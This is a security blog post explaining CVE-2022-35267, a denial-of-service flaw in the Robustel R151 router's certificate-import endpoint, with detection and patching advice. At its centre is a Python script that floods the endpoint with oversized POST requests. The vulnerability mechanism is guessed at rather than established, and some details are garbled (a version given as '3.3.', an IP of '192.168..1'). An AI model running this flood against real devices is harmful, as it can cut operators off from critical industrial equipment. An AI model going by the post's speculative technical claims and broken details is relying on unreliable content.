CVE CyberSecurity Database News

CVE-2022-35267 - Denial of Service in Robustel R151 Web Server (`/action/import_https_cert_file/`) — Vulnerability Explained

Poster -

One of the silent yet devastating attacks on network devices comes from what is known as Denial of Service (DoS) vulnerabilities. In this article, we take a deep dive into CVE-2022-35267, a vulnerability that affects the Robustel R151 router versions 3.1.16 and 3.3.. This vulnerability can allow an attacker to render a device unusable—potentially cutting off critical infrastructure—using nothing but network requests and a quirk in the web server’s hash processing.

What is the Robustel R151?

The Robustel R151 is a widely used industrial cellular router, often deployed for remote monitoring, industrial automation, and IoT applications. It features a built-in web server for administration, where users can import and manage certificates among many other things.

Where does the issue lie?

The problem sits in a web server endpoint: /action/import_https_cert_file/. If you send requests to this API in a specific way, the router's web server can get stuck, causing a halt, soft reboot, or just endless sluggishness.

Vulnerability Details

Vulnerability Name: CVE-2022-35267  
Product: Robustel R151  
Firmware Versions Affected: 3.1.16 and 3.3.  
Component: web_server hashFirst function, /action/import_https_cert_file/ endpoint  
Type: Denial of Service (DoS)

How Does It Work?

The web server expects a properly formed request to /action/import_https_cert_file/ for importing HTTPS cert files. However, thanks to insufficient bounds checking or error handling inside a low-level function (likely named hashFirst), an attacker can send a deliberately malformed or oversized payload.

Repeated, carefully crafted requests can exhaust system resources or trigger a code path that locks up the service—leading either to a crash, a soft reboot, or outright denial of access to the management interface.

Attack Scenario

Who could be affected?  
Any organization using a vulnerable Robustel R151 router accessible from a network segment controlled by an attacker.

What’s the risk?  
An attacker can cut off network operators from managing or monitoring their device. In environments where these routers are the only connection to remote assets, this could lead to serious consequences.

Exploit Example

Here’s a simplified Python script that demonstrates how the vulnerability might be triggered. This is for educational purposes only; always have written permission before testing a system.

import requests

target = "http://192.168..1";  # Change to your test device's IP

url = target + "/action/import_https_cert_file/"

# Craft a malicious POST request, e.g., oversize the payload
malicious_payload = {
    "cert_file": "A" * 10000  # Intentionally large, may trigger the bug
}

try:
    for i in range(100):  # Send a burst of malicious requests
        response = requests.post(url, data=malicious_payload, timeout=2)
        print(f"Attempt {i+1}: HTTP {response.status_code}")
except Exception as e:
    print("Error:", e)

*Note:* The real attack may use slightly different parameters or headers, but the principle is the same: exhaust the router by abusing the vulnerable endpoint.

CVE Entry:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35267

NVD Details:

https://nvd.nist.gov/vuln/detail/CVE-2022-35267

*(Not always available; for official info, check Robustel's Security Advisories page)*

Check the firmware version of your R151. If you see 3.1.16 or 3.3., you are likely at risk.

- Look for unexplained device lockups or reboots, especially after unknown POST requests to the affected endpoint.

Upgrade Firmware:

Robustel has issued newer firmware updates. Download the latest version from their site or your distributor.

Monitor Logs:

Watch for repeated failed POSTs to /action/import_https_cert_file/ in your device’s logs.

Conclusion

CVE-2022-35267 is a textbook example of how a small flaw in parsing web requests can lead to major headaches for industrial network operators. Patch your devices and never expose unnecessary services to untrusted networks. Remember, even industrial routers are just small servers—they can be brought down by the simplest requests if misconfigured.


*Stay secure. Keep an eye on firmware updates, and always review accessible endpoints on your network devices!*


Disclaimer:  
This article is for educational purposes. Do not exploit vulnerabilities on systems you do not own or have explicit permission to test.


Like this post?  
Check out more security writeups and subscribe for updates on the latest industrial IoT vulnerabilities!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 03/01/2023 01:52:00 UTC